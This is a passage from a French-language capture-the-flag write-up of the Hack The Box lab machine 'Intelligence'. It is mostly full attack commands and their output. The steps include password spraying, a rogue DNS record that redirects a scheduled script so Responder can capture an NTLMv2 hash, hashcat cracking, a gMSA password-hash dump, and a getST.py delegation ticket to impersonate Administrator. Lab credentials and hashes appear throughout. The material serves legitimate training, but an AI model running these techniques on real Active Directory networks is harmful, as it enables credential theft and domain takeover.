@ropnop </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; Using KDC<span class="o">(</span>s<span class="o">)</span>: </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; dc.intelligence.htb:88 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Stephanie.Young@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Veronica.Patel@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Jason.Wright@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: David.Reed@intelligence.htb </span></span><span class="line"><span class="cl">2025/09/03 16:03:02 &gt; <span class="o">[</span>+<span class="o">]</span> VALID USERNAME: Scott.Scott@intelligence.htb </span></span><span class="line"><span class="cl">...... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.10.248 -u users.txt -p pass.txt </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:intelligence.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>-<span class="o">]</span> intelligence.htb<span class="se">\W</span>illiam.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>-<span class="o">]</span> intelligence.htb<span class="se">\J</span>ason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>-<span class="o">]</span> intelligence.htb<span class="se">\R</span>ichard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> intelligence.htb<span class="se">\T</span>iffany.Molina:NewIntelligenceCorpUser9876 </span></span></code></pre></td></tr></table> </div> </div><h3 id="tiffanymolina--user-flag">Tiffany.Molina : user flag </h3><p>On trouve un Share <strong>User</strong> accessible en lecture par Tiffany. On trouve finalement les fichiers de Tiffany et le flag user.txt</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient //10.10.10.248/users -U <span class="s1">&#39;Tiffany.Molina%NewIntelligenceCorpUser9876&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . DR <span class="m">0</span> Mon Apr <span class="m">19</span> 03:20:26 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> .. DR <span class="m">0</span> Mon Apr <span class="m">19</span> 03:20:26 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Administrator D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:18:39 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> All Users DHSrn <span class="m">0</span> Sat Sep <span class="m">15</span> 09:21:46 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Default DHR <span class="m">0</span> Mon Apr <span class="m">19</span> 04:17:40 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Default User DHSrn <span class="m">0</span> Sat Sep <span class="m">15</span> 09:21:46 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> desktop.ini AHS <span class="m">174</span> Sat Sep <span class="m">15</span> 09:11:27 <span class="m">2018</span> </span></span><span class="line"><span class="cl"> Public DR <span class="m">0</span> Mon Apr <span class="m">19</span> 02:18:39 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Ted.Graves D <span class="m">0</span> Mon Apr <span class="m">19</span> 03:20:26 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> Tiffany.Molina D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:51:46 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">3770367</span> blocks of size 4096. <span class="m">1453992</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> <span class="nb">cd</span> Tiffany.molina </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\&gt;</span> <span class="nb">cd</span> Desktop </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . DR <span class="m">0</span> Mon Apr <span class="m">19</span> 02:51:46 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> .. DR <span class="m">0</span> Mon Apr <span class="m">19</span> 02:51:46 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> user.txt AR <span class="m">34</span> Wed Sep <span class="m">3</span> 21:31:06 <span class="m">2025</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">3770367</span> blocks of size 4096. <span class="m">1453992</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\&gt;</span> get user.txt </span></span><span class="line"><span class="cl">getting file <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\u</span>ser.txt of size <span class="m">34</span> as user.txt <span class="o">(</span>0.2 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 0.2 KiloBytes/sec<span class="o">)</span> </span></span><span class="line"><span class="cl">smb: <span class="se">\T</span>iffany.molina<span class="se">\D</span>esktop<span class="se">\&gt;</span> </span></span><span class="line"><span class="cl">$ cat user.txt </span></span><span class="line"><span class="cl">359b.....159e </span></span></code></pre></td></tr></table> </div> </div><h3 id="rusthound-bloodhound">Rusthound bloodhound </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ rusthound -d intelligence.htb -u <span class="s2">&#34;Tiffany.Molina&#34;</span>@<span class="s2">&#34;intelligence.htb&#34;</span> -p <span class="s2">&#34;NewIntelligenceCorpUser9876&#34;</span> -o /workspace/Intelligence/bloodhount_data --zip -n 10.10.10.248 </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl">Initializing RustHound at 16:50:28 on 09/03/25 </span></span><span class="line"><span class="cl">Powered by g0h4n from OpenCyber </span></span><span class="line"><span class="cl">--------------------------------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound<span class="o">]</span> Verbosity level: Info </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::ldap<span class="o">]</span> Connected to INTELLIGENCE.HTB Active Directory! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::ldap<span class="o">]</span> Starting data collection... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::ldap<span class="o">]</span> All data collected <span class="k">for</span> NamingContext <span class="nv">DC</span><span class="o">=</span>intelligence,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::parser<span class="o">]</span> Starting the LDAP objects parsing... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::parser::bh_41<span class="o">]</span> MachineAccountQuota: <span class="m">10</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::parser<span class="o">]</span> Parsing LDAP objects finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::checker<span class="o">]</span> Starting checker to replace some values... </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::checker<span class="o">]</span> Checking and replacing some values finished! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:28Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">43</span> users parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">63</span> groups parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> computers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> ous parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">1</span> domains parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">2</span> gpos parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> <span class="m">21</span> containers parsed! </span></span><span class="line"><span class="cl"><span class="o">[</span>2025-09-03T14:50:29Z INFO rusthound::json::maker<span class="o">]</span> /workspace/Intelligence/bloodhount_data/20250903165028_intelligence-htb_rusthound.zip created! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">RustHound Enumeration Completed at 16:50:29 on 09/03/25! Happy Graphing! </span></span></code></pre></td></tr></table> </div> </div><h2 id="tiffanymolina---tedgraves">Tiffany.Molina -&gt; Ted.Graves </h2><h3 id="smb--it-share">SMB : IT Share </h3><p>En se connectant au share <strong>IT</strong> on remarque un script <strong>powershell</strong>. Ce script parcourt tous les domaines DNS enregistrés commencant par &ldquo;web&rdquo; puis effectue une requête HTTP avec Invoke-WebRequest. Si le site n&rsquo;est pas actif, alors la requête echoue et un mail est envoyé à Ted.</p> <p>Il est indiqué que le script est executé toutes les 5mn, et vraisembablement est executé par Ted lui même. On remarque l&rsquo;utilisation du paramètre <strong>-UseDefaultCredentials</strong> ce qui signifie que les creds de celui qui l&rsquo;execute sont transmis lors de la requête.</p> <p>Si on arrive à detourner le script pour lui faire faire une requête vers notre ordinateur, on pourrait recupérer le mot de passe de Ted.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient //10.10.10.248/it -U <span class="s1">&#39;Tiffany.Molina%NewIntelligenceCorpUser9876&#39;</span> </span></span><span class="line"><span class="cl">Try <span class="s2">&#34;help&#34;</span> to get a list of possible commands. </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> ls </span></span><span class="line"><span class="cl"> . D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:50:55 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> .. D <span class="m">0</span> Mon Apr <span class="m">19</span> 02:50:55 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> downdetector.ps1 A <span class="m">1046</span> Mon Apr <span class="m">19</span> 02:50:55 <span class="m">2021</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="m">3770367</span> blocks of size 4096. <span class="m">1453177</span> blocks available </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> get downdetector.ps1 </span></span><span class="line"><span class="cl">getting file <span class="se">\d</span>owndetector.ps1 of size <span class="m">1046</span> as downdetector.ps1 <span class="o">(</span>13.4 KiloBytes/sec<span class="o">)</span> <span class="o">(</span>average 13.4 KiloBytes/sec<span class="o">)</span> </span></span><span class="line"><span class="cl">smb: <span class="se">\&gt;</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>Sep 03, <span class="m">2025</span> - 17:13:40 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Intelligence <span class="c1"># cat downdetector.ps1 </span> </span></span><span class="line"><span class="cl">��# Check web server status. Scheduled to run every 5min </span></span><span class="line"><span class="cl">Import-Module ActiveDirectory </span></span><span class="line"><span class="cl">foreach<span class="o">(</span><span class="nv">$record</span> in Get-ChildItem <span class="s2">&#34;AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb&#34;</span> <span class="p">|</span> Where-Object Name -like <span class="s2">&#34;web*&#34;</span><span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl">try <span class="o">{</span> </span></span><span class="line"><span class="cl"><span class="nv">$request</span> <span class="o">=</span> Invoke-WebRequest -Uri <span class="s2">&#34;http://</span><span class="k">$(</span><span class="nv">$record</span>.Name<span class="k">)</span><span class="s2">&#34;</span> -UseDefaultCredentials </span></span><span class="line"><span class="cl"><span class="k">if</span><span class="o">(</span>.StatusCode -ne 200<span class="o">)</span> <span class="o">{</span> </span></span><span class="line"><span class="cl">Send-MailMessage -From <span class="s1">&#39;Ted Graves &lt;Ted.Graves@intelligence.htb&gt;&#39;</span> -To <span class="s1">&#39;Ted Graves &lt;Ted.Graves@intelligence.htb&gt;&#39;</span> -Subject <span class="s2">&#34;Host: </span><span class="k">$(</span><span class="nv">$record</span>.Name<span class="k">)</span><span class="s2"> is down&#34;</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> catch <span class="o">{}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>L&rsquo;idée est donc:</p> <ul> <li>Créer un record DNS commençant par &ldquo;web&rdquo; avec le compte de Tiffany</li> <li>Mettre en place un <strong>responder</strong>, qui attend de recevoir une requête et nous donnera un hachage</li> <li>Déchiffrer le hachage.</li> </ul> <h3 id="new-dns-record">New DNS Record </h3><p>On crée un nouveau DNS record : <strong>web666</strong>. Il pointe vers notre IP. Pour cela on peut utiliser l&rsquo;outil <strong>dnstool.py</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ dnstool.py -u <span class="s1">&#39;intelligence.htb\Tiffany.Molina&#39;</span> -p <span class="s1">&#39;NewIntelligenceCorpUser9876&#39;</span> -r web666 -a add -d 10.10.16.10 10.10.10.248 </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Connecting to host... </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Binding to host </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Bind OK </span></span><span class="line"><span class="cl"><span class="o">[</span>-<span class="o">]</span> Adding new record </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> LDAP operation completed successfully </span></span></code></pre></td></tr></table> </div> </div><h3 id="responder">Responder </h3><p>On se met en attente d&rsquo;une requête, avec la commande <strong>responder</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="o">[</span>Sep 03, <span class="m">2025</span> - 22:43:49 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Intelligence <span class="c1"># responder -I tun0 -w -F </span> </span></span><span class="line"><span class="cl"> __ </span></span><span class="line"><span class="cl"> .----.-----.-----.-----.-----.-----.--<span class="p">|</span> <span class="p">|</span>.-----.----. </span></span><span class="line"><span class="cl"> <span class="p">|</span> _<span class="p">|</span> -__<span class="p">|</span>__ --<span class="p">|</span> _ <span class="p">|</span> _ <span class="p">|</span> <span class="p">|</span> _ <span class="o">||</span> -__<span class="p">|</span> _<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> <span class="p">|</span>_____<span class="p">|</span>_____<span class="p">|</span> __<span class="p">|</span>_____<span class="p">|</span>__<span class="p">|</span>__<span class="p">|</span>_____<span class="o">||</span>_____<span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="p">|</span>__<span class="p">|</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> NBT-NS, LLMNR <span class="p">&amp;</span> MDNS Responder 3.1.5.0 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>+<span class="o">]</span> Listening <span class="k">for</span> events... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Error starting TCP server on port 53, check permissions or other servers running. </span></span><span class="line"><span class="cl"><span class="o">[</span>HTTP<span class="o">]</span> NTLMv2 Client : 10.10.10.248 </span></span><span class="line"><span class="cl"><span class="o">[</span>HTTP<span class="o">]</span> NTLMv2 Username : intelligence<span class="se">\T</span>ed.Graves </span></span><span class="line"><span class="cl"><span class="o">[</span>HTTP<span class="o">]</span> NTLMv2 Hash : Ted.Graves::intelligence:1122334455667788:BF2803FDDC9EEF7CD931A308E83AAF83:0101000000000000579387554E1DDC014DF34E0577DDBE3A0000000002000800510054003200360001001E00570049004E002D00440046003200570030004700530042004500390050000400140051005400320036002E004C004F00430041004C0003003400570049004E002D00440046003200570030004700530042004500390050002E0051005400320036002E004C004F00430041004C000500140051005400320036002E004C004F00430041004C00080030003000000000000000000000000020000027B3134561E5EAEC1547E28450320466E1AC51EF296269768842659E2D2AD00B0A001000000000000000000000000000000000000900380048005400540050002F007700650062003600360036002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000 </span></span></code></pre></td></tr></table> </div> </div><h3 id="ted-ntlmv2-hash">Ted NTLMv2 Hash </h3><p>On effectue une attaque par dictionnaire sur le hachage NTLMv2 de Ted.graves et on obtient les credentials suivants : Ted : <code>Mr.Teddy</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">5600</span> ./hash.txt ~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">TED.GRAVES::intelligence:112.......000:Mr.Teddy </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">5600</span> <span class="o">(</span>NetNTLMv2<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: TED.GRAVES::intelligence:1122334455667788:bf2803fdd...000000 </span></span><span class="line"><span class="cl">Time.Started.....: Wed Sep <span class="m">3</span> 22:47:36 <span class="m">2025</span> <span class="o">(</span><span class="m">2</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Wed Sep <span class="m">3</span> 22:47:38 <span class="m">2025</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.10.248 -u Ted.graves -p <span class="s1">&#39;Mr.Teddy&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows <span class="m">10</span> / Server <span class="m">2019</span> Build <span class="m">17763</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:intelligence.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.10.248 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> intelligence.htb<span class="se">\T</span>ed.graves:Mr.Teddy </span></span></code></pre></td></tr></table> </div> </div><h2 id="tedgraves---svc_int">Ted.Graves -&gt; svc_int$ </h2><h3 id="readgmsapassword-right-on-svc_int">ReadGMSAPassword Right on svc_int$ </h3><p>En utilisant bloodhound, on découvre que Ted.Graves fait parti du groupe <strong>ITSupport</strong> qui a le droit <strong>ReadGMSAPassword</strong> sur l&rsquo;utilisateur <strong>svc_int$</strong>.</p> <p><img src="https://leopoldabgn.github.io/writeups/p/intelligence-htb/svc_int.png" width="1134" height="731" srcset="https://leopoldabgn.github.io/writeups/p/intelligence-htb/svc_int_hu_c713dae335ef7ad7.png 480w, https://leopoldabgn.github.io/writeups/p/intelligence-htb/svc_int_hu_3e23e0760d3b044d.png 1024w" loading="lazy" alt="bloodhound: Ted -&gt; svc_int" class="gallery-image" data-flex-grow="155" data-flex-basis="372px" ></p> <p>En utilisant la commande gMSADumper.py on peut alors dumper le hachage de <strong>svc_int$</strong> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">gMSADumper.py -u <span class="s1">&#39;Ted.Graves&#39;</span> -p <span class="s1">&#39;Mr.Teddy&#39;</span> -d <span class="s1">&#39;intelligence.htb&#39;</span> </span></span><span class="line"><span class="cl">Users or groups who can <span class="nb">read</span> password <span class="k">for</span> svc_int$: </span></span><span class="line"><span class="cl"> &gt; DC$ </span></span><span class="line"><span class="cl"> &gt; itsupport </span></span><span class="line"><span class="cl">svc_int$:::1dcabcce2cf522bae77d7dc622587879 </span></span><span class="line"><span class="cl">svc_int$:aes256-cts-hmac-sha1-96:331c8820d64c744ba82a28551b76dc2dc00991df0e253fa613d37c4684e045fd </span></span><span class="line"><span class="cl">svc_int$:aes128-cts-hmac-sha1-96:40122d8d49ee8c46ea793c19b3a59d08 </span></span></code></pre></td></tr></table> </div> </div><h2 id="svc_int---administrator">svc_int$ -&gt; Administrator </h2><h3 id="msds-allowedtodelegateto--wwwdcintelligencehtb">msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb </h3><p>On remarque que svc_int peut : msDS-AllowedToDelegateTo : WWW/dc.intelligence.htb</p> <p>Ce qui veut dire que svc_int$ peut se faire passer pour un autre utilisateur uniquement vers le service WWW/dc.intelligence.htb. On peut aussi voir ce resultat directement dans bloodhound.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ldapsearch -x -H ldap://10.10.10.248 -D <span class="s2">&#34;intelligence\Ted.Graves&#34;</span> -w <span class="s2">&#34;Mr.Teddy&#34;</span> -b <span class="s2">&#34;DC=intelligence,DC=htb&#34;</span> <span class="p">|</span> grep -i msDS-AllowedToDel -A20 -B40 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># svc_int, Managed Service Accounts, intelligence.htb</span> </span></span><span class="line"><span class="cl">dn: <span class="nv">CN</span><span class="o">=</span>svc_int,CN<span class="o">=</span>Managed Service Accounts,DC<span class="o">=</span>intelligence,DC<span class="o">=</span>htb </span></span><span class="line"><span class="cl">objectClass: top </span></span><span class="line"><span class="cl">objectClass: person </span></span><span class="line"><span class="cl">objectClass: organizationalPerson </span></span><span class="line"><span class="cl">objectClass: user </span></span><span class="line"><span class="cl">objectClass: computer </span></span><span class="line"><span class="cl">objectClass: msDS-GroupManagedServiceAccount </span></span><span class="line"><span class="cl">cn: svc_int </span></span><span class="line"><span class="cl">distinguishedName: <span class="nv">CN</span><span class="o">=</span>svc_int,CN<span class="o">=</span>Managed Service Accounts,DC<span class="o">=</span>intelligence,DC<span class="o">=</span>h </span></span><span class="line"><span class="cl"> tb </span></span><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl">msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb </span></span></code></pre></td></tr></table> </div> </div><h3 id="silver-ticket--impersonate-administrator">Silver Ticket : impersonate Administrator </h3><p>On peut maintenant se faire passer pour l&rsquo;administrateur en générant un silver ticket pour le SPN WWW/dc.intelligence.htb.</p> <p>On utilise ensuite <strong>psexec</strong> pour obtenir un powershell en tant qu&rsquo;admin avec le ticket généré :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int$ -dc-ip 10.10.10.248 -hashes :1dcabcce2cf522bae77d7dc622587879 </span></span><span class="line"><span class="cl"> </span></span><span 